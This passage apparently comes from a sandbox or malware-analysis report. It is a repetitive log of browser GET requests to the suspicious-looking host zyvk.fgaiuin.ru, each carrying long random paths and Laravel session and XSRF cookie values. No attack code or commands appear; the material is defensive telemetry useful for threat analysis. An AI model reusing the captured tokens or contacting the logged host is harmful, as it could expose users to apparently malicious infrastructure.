laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /qrkq6tjIc3r5nBX8S7OdUDvbneJNdxGQmnJ7dx0HaqNlcmCbG67140 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /wx15xRgFt39795h1KKeDjVzWpWO0OrsbkvAK4y71EU515ot90176 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /mnEMzb8jUNnKVyAT3k5kL57E6Hgba7eIuvr3UyuGz2C3Jh6U06zE378147 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /klGIQ3dTgD1URPJXa8mcdnV4FEGbv8KXpXQGkBx78170 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /apP1I1v3t06SAbzw9mvtIB0Mq1bYC8AwtydbW1CC5CJBgYfG4rBstbLOiHPj8 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijladk9CTDRrbVQvcWdvcGdEWkdZRlE9PSIsInZhbHVlIjoiV0kxM3hBV2RSUkVHcVlLOHl0SnRoUVg1c0VtdXQ3WVhlUTc2dXJicVZ5N3F4ZkhNNDIxU3d3SDF4U0dtRGdvamtwSS9FV1dwdlBzQjB4UWNvNUw0WThFUXpxMGUzOUZmSTA3RjNqTStVc1I4TFVNUlBIaFBvOG10U0NIQlJaTE4iLCJtYWMiOiJmZTUyZmMzNTA4M2Y1MjhjNTRjYjY5NzQ0Y2NkNTU2YmZkY2ZiOWI3ZWUyNTYyMTQ1MDY5YzhlNmNhNTc1M2JlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFCbmVTWWdWWnRxb3ZGSGx6aDNOWHc9PSIsInZhbHVlIjoiR2F4YzRsaDVBcExtZndWYVhiTzQ5TWhjM3g3UVp4SHhFNWx2dURWdWJ5RGFKWEZwZEpNSzRMYlpxNitaU3oyZjJSaldzV2xST1oraEdyREIwREVUNVljOHg0VmtGUDdYYlJ1VDlBM1JlTmZrRlNXKy8rbHdHeThoaS9JR0lQTnEiLCJtYWMiOiJhZmQ4N2MzYTRlOThjZTYyNjE2MGMyNjdhMzNmODQ3YzViNDQ4OWI1OTY5NWU5MjUzMWMxZjcyMjljZWQzYzc0IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /rs1tEVctIEvVMForyhoqljWxFNIghHfWamSauodo7dwGpwh40leoQqcylchef193 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhRbGRsUTJIR3d6VlBlSEZFa0xFbFE9PSIsInZhbHVlIjoiSjI1eXo4TWZsQW8xMEFDeFVwNys2eHRnd044bVlBbEFObzRIdW04ZXorKzVXM0VQY0FNZFdSK3lNRkpXTUFuTjJiU3VyU1pnWGZHR1VKVGQzTHFGMkhURHJsS3NYb3o5WXhWUDFRTXVrc2RjcU1NaWs4N3RZRHFBcm40alhDbVEiLCJtYWMiOiJlMjlkMDNkYzBhYzUzZTk2NzZlNmFlMTYyOGMyNmVlODU1MzcxZDM3ZjlmNjdiMzMyODA2NzQ5MmQxMzMwMDdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktGbUJQMHpWRTZVSE5rRUU5bGpLN0E9PSIsInZhbHVlIjoicUZvOGRKeHVwbngwNGFrOTN5Z3hTbkZ1TUxQZGloZ1dHZUtHcWNpSWRDRC9vZDVQQjdmSnd0ZmxSenowNDJrOExISGJkTHVQSnJmK3ZwdHIrOWlwSnVCZDdSaFhPYTRQWlpXLzZySXdUK2VQVkRCbjd3dHRCaE1SbnZFU2lzTDUiLCJtYWMiOiIxOTkwNGI5NjcyM2JjZDY2MjcyZDVjMjk5NzQ4NGE3Y2YxMWYxM2ZkZjVhMmM0YTQzMzViMTNjOGUyNDUzNmIzIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ijy2fRQQJuz4z04afoy15ExbmbUYT6xx10nJD7vmnUY6HNJ3QW1gCt7rwnOgycX0cZOI7rFef205 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijladk9CTDRrbVQvcWdvcGdEWkdZRlE9PSIsInZhbHVlIjoiV0kxM3hBV2RSUkVHcVlLOHl0SnRoUVg1c0VtdXQ3WVhlUTc2dXJicVZ5N3F4ZkhNNDIxU3d3SDF4U0dtRGdvamtwSS9FV1dwdlBzQjB4UWNvNUw0WThFUXpxMGUzOUZmSTA3RjNqTStVc1I4TFVNUlBIaFBvOG10U0NIQlJaTE4iLCJtYWMiOiJmZTUyZmMzNTA4M2Y1MjhjNTRjYjY5NzQ0Y2NkNTU2YmZkY2ZiOWI3ZWUyNTYyMTQ1MDY5YzhlNmNhNTc1M2JlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFCbmVTWWdWWnRxb3ZGSGx6aDNOWHc9PSIsInZhbHVlIjoiR2F4YzRsaDVBcExtZndWYVhiTzQ5TWhjM3g3UVp4SHhFNWx2dURWdWJ5RGFKWEZwZEpNSzRMYlpxNitaU3oyZjJSaldzV2xST1oraEdyREIwREVUNVljOHg0VmtGUDdYYlJ1VDlBM1JlTmZrRlNXKy8rbHdHeThoaS9JR0lQTnEiLCJtYWMiOiJhZmQ4N2MzYTRlOThjZTYyNjE2MGMyNjdhMzNmODQ3YzViNDQ4OWI1OTY5NWU5MjUzMWMxZjcyMjljZWQzYzc0IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /opTZQRdFZXI9raOJwdpsyGfsdyKJ2TK5PdTfLOBJSR9iV5IPstBSa36UESJdcDFjfpdeY2Hne2mI0PwYCVcd240 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijladk9CTDRrbVQvcWdvcGdEWkdZRlE9PSIsInZhbHVlIjoiV0kxM3hBV2RSUkVHcVlLOHl0SnRoUVg1c0VtdXQ3WVhlUTc2dXJicVZ5N3F4ZkhNNDIxU3d3SDF4U0dtRGdvamtwSS9FV1dwdlBzQjB4UWNvNUw0WThFUXpxMGUzOUZmSTA3RjNqTStVc1I4TFVNUlBIaFBvOG10U0NIQlJaTE4iLCJtYWMiOiJmZTUyZmMzNTA4M2Y1MjhjNTRjYjY5NzQ0Y2NkNTU2YmZkY2ZiOWI3ZWUyNTYyMTQ1MDY5YzhlNmNhNTc1M2JlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFCbmVTWWdWWnRxb3ZGSGx6aDNOWHc9PSIsInZhbHVlIjoiR2F4YzRsaDVBcExtZndWYVhiTzQ5TWhjM3g3UVp4SHhFNWx2dURWdWJ5RGFKWEZwZEpNSzRMYlpxNitaU3oyZjJSaldzV2xST1oraEdyREIwREVUNVljOHg0VmtGUDdYYlJ1VDlBM1JlTmZrRlNXKy8rbHdHeThoaS9JR0lQTnEiLCJtYWMiOiJhZmQ4N2MzYTRlOThjZTYyNjE2MGMyNjdhMzNmODQ3YzViNDQ4OWI1OTY5NWU5MjUzMWMxZjcyMjljZWQzYzc0IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /kl8nL56d8pZlDKHXb3O9fQ6A4DEUrS43RyU4x6MwT89WXpqksm7APjTJNpecrdCab230 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijladk9CTDRrbVQvcWdvcGdEWkdZRlE9PSIsInZhbHVlIjoiV0kxM3hBV2RSUkVHcVlLOHl0SnRoUVg1c0VtdXQ3WVhlUTc2dXJicVZ5N3F4ZkhNNDIxU3d3SDF4U0dtRGdvamtwSS9FV1dwdlBzQjB4UWNvNUw0WThFUXpxMGUzOUZmSTA3RjNqTStVc1I4TFVNUlBIaFBvOG10U0NIQlJaTE4iLCJtYWMiOiJmZTUyZmMzNTA4M2Y1MjhjNTRjYjY5NzQ0Y2NkNTU2YmZkY2ZiOWI3ZWUyNTYyMTQ1MDY5YzhlNmNhNTc1M2JlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFCbmVTWWdWWnRxb3ZGSGx6aDNOWHc9PSIsInZhbHVlIjoiR2F4YzRsaDVBcExtZndWYVhiTzQ5TWhjM3g3UVp4SHhFNWx2dURWdWJ5RGFKWEZwZEpNSzRMYlpxNitaU3oyZjJSaldzV2xST1oraEdyREIwREVUNVljOHg0VmtGUDdYYlJ1VDlBM1JlTmZrRlNXKy8rbHdHeThoaS9JR0lQTnEiLCJtYWMiOiJhZmQ4N2MzYTRlOThjZTYyNjE2MGMyNjdhMzNmODQ3YzViNDQ4OWI1OTY5NWU5MjUzMWMxZjcyMjljZWQzYzc0IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /stIrN6fgetKZ2pEHJbr5ECSIda45Rwn0FB9toxb2HlSxdtTGNoGturGef251 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijladk9CTDRrbVQvcWdvcGdEWkdZRlE9PSIsInZhbHVlIjoiV0kxM3hBV2RSUkVHcVlLOHl0SnRoUVg1c0VtdXQ3WVhlUTc2dXJicVZ5N3F4ZkhNNDIxU3d3SDF4U0dtRGdvamtwSS9FV1dwdlBzQjB4UWNvNUw0WThFUXpxMGUzOUZmSTA3RjNqTStVc1I4TFVNUlBIaFBvOG10U0NIQlJaTE4iLCJtYWMiOiJmZTUyZmMzNTA4M2Y1MjhjNTRjYjY5NzQ0Y2NkNTU2YmZkY2ZiOWI3ZWUyNTYyMTQ1MDY5YzhlNmNhNTc1M2JlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFCbmVTWWdWWnRxb3ZGSGx6aDNOWHc9PSIsInZhbHVlIjoiR2F4YzRsaDVBcExtZndWYVhiTzQ5TWhjM3g3UVp4SHhFNWx2dURWdWJ5RGFKWEZwZEpNSzRMYlpxNitaU3oyZjJSaldzV2xST1oraEdyREIwREVUNVljOHg0VmtGUDdYYlJ1VDlBM1JlTmZrRlNXKy8rbHdHeThoaS9JR0lQTnEiLCJtYWMiOiJhZmQ4N2MzYTRlOThjZTYyNjE2MGMyNjdhMzNmODQ3YzViNDQ4OWI1OTY5NWU5MjUzMWMxZjcyMjljZWQzYzc0IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /wx15xRgFt39795h1KKeDjVzWpWO0OrsbkvAK4y71EU515ot90176 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijladk9CTDRrbVQvcWdvcGdEWkdZRlE9PSIsInZhbHVlIjoiV0kxM3hBV2RSUkVHcVlLOHl0SnRoUVg1c0VtdXQ3WVhlUTc2dXJicVZ5N3F4ZkhNNDIxU3d3SDF4U0dtRGdvamtwSS9FV1dwdlBzQjB4UWNvNUw0WThFUXpxMGUzOUZmSTA3RjNqTStVc1I4TFVNUlBIaFBvOG10U0NIQlJaTE4iLCJtYWMiOiJmZTUyZmMzNTA4M2Y1MjhjNTRjYjY5NzQ0Y2NkNTU2YmZkY2ZiOWI3ZWUyNTYyMTQ1MDY5YzhlNmNhNTc1M2JlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFCbmVTWWdWWnRxb3ZGSGx6aDNOWHc9PSIsInZhbHVlIjoiR2F4YzRsaDVBcExtZndWYVhiTzQ5TWhjM3g3UVp4SHhFNWx2dURWdWJ5RGFKWEZwZEpNSzRMYlpxNitaU3oyZjJSaldzV2xST1oraEdyREIwREVUNVljOHg0VmtGUDdYYlJ1VDlBM1JlTmZrRlNXKy8rbHdHeThoaS9JR0lQTnEiLCJtYWMiOiJhZmQ4N2MzYTRlOThjZTYyNjE2MGMyNjdhMzNmODQ3YzViNDQ4OWI1OTY5NWU5MjUzMWMxZjcyMjljZWQzYzc0IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /klBiF5nBFGI9ZBA6VNTLBYDtbLEUH4xH2WD565XSQVInIrw2Ga7S5GyD4TQujTVYuv213 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijladk9CTDRrbVQvcWdvcGdEWkdZRlE9PSIsInZhbHVlIjoiV0kxM3hBV2RSUkVHcVlLOHl0SnRoUVg1c0VtdXQ3WVhlUTc2dXJicVZ5N3F4ZkhNNDIxU3d3SDF4U0dtRGdvamtwSS9FV1dwdlBzQjB4UWNvNUw0WThFUXpxMGUzOUZmSTA3RjNqTStVc1I4TFVNUlBIaFBvOG10U0NIQlJaTE4iLCJtYWMiOiJmZTUyZmMzNTA4M2Y1MjhjNTRjYjY5NzQ0Y2NkNTU2YmZkY2ZiOWI3ZWUyNTYyMTQ1MDY5YzhlNmNhNTc1M2JlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFCbmVTWWdWWnRxb3ZGSGx6aDNOWHc9PSIsInZhbHVlIjoiR2F4YzRsaDVBcExtZndWYVhiTzQ5TWhjM3g3UVp4SHhFNWx2dURWdWJ5RGFKWEZwZEpNSzRMYlpxNitaU3oyZjJSaldzV2xST1oraEdyREIwREVUNVljOHg0VmtGUDdYYlJ1VDlBM1JlTmZrRlNXKy8rbHdHeThoaS9JR0lQTnEiLCJtYWMiOiJhZmQ4N2MzYTRlOThjZTYyNjE2MGMyNjdhMzNmODQ3YzViNDQ4OWI1OTY5NWU5MjUzMWMxZjcyMjljZWQzYzc0IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /rs1tEVctIEvVMForyhoqljWxFNIghHfWamSauodo7dwGpwh40leoQqcylchef193 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijladk9CTDRrbVQvcWdvcGdEWkdZRlE9PSIsInZhbHVlIjoiV0kxM3hBV2RSUkVHcVlLOHl0SnRoUVg1c0VtdXQ3WVhlUTc2dXJicVZ5N3F4ZkhNNDIxU3d3SDF4U0dtRGdvamtwSS9FV1dwdlBzQjB4UWNvNUw0WThFUXpxMGUzOUZmSTA3RjNqTStVc1I4TFVNUlBIaFBvOG10U0NIQlJaTE4iLCJtYWMiOiJmZTUyZmMzNTA4M2Y1MjhjNTRjYjY5NzQ0Y2NkNTU2YmZkY2ZiOWI3ZWUyNTYyMTQ1MDY5YzhlNmNhNTc1M2JlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFCbmVTWWdWWnRxb3ZGSGx6aDNOWHc9PSIsInZhbHVlIjoiR2F4YzRsaDVBcExtZndWYVhiTzQ5TWhjM3g3UVp4SHhFNWx2dURWdWJ5RGFKWEZwZEpNSzRMYlpxNitaU3oyZjJSaldzV2xST1oraEdyREIwREVUNVljOHg0VmtGUDdYYlJ1VDlBM1JlTmZrRlNXKy8rbHdHeThoaS9JR0lQTnEiLCJtYWMiOiJhZmQ4N2MzYTRlOThjZTYyNjE2MGMyNjdhMzNmODQ3YzViNDQ4OWI1OTY5NWU5MjUzMWMxZjcyMjljZWQzYzc0IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ijy2fRQQJuz4z04afoy15ExbmbUYT6xx10nJD7vmnUY6HNJ3QW1gCt7rwnOgycX0cZOI7rFef205 HTTP/1.1Host: zyvk.fgaiuin.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijladk9CTDRrbVQvcWdvcGdEWkdZRlE9PSIsInZhbHVlIjoiV0kxM3hBV2RSUkVHcVlLOHl0SnRoUVg1c0VtdXQ3WVhlUTc2dXJicVZ5N3F4ZkhNNDIxU3d3SDF4U0dtRGdvamtwSS9FV1dwdlBzQjB4UWNvNUw0WThFUXpxMGUzOUZmSTA3RjNqTStVc1I4TFVNUlBIaFBvOG10U0NIQlJaTE4iLCJtYWMiOiJmZTUyZmMzNTA4M2Y1MjhjNTRjYjY5NzQ0Y2NkNTU2YmZkY2ZiOWI3ZWUyNTYyMTQ1MDY5YzhlNmNhNTc1M2JlIiwidGFnIjoiIn0%3D; 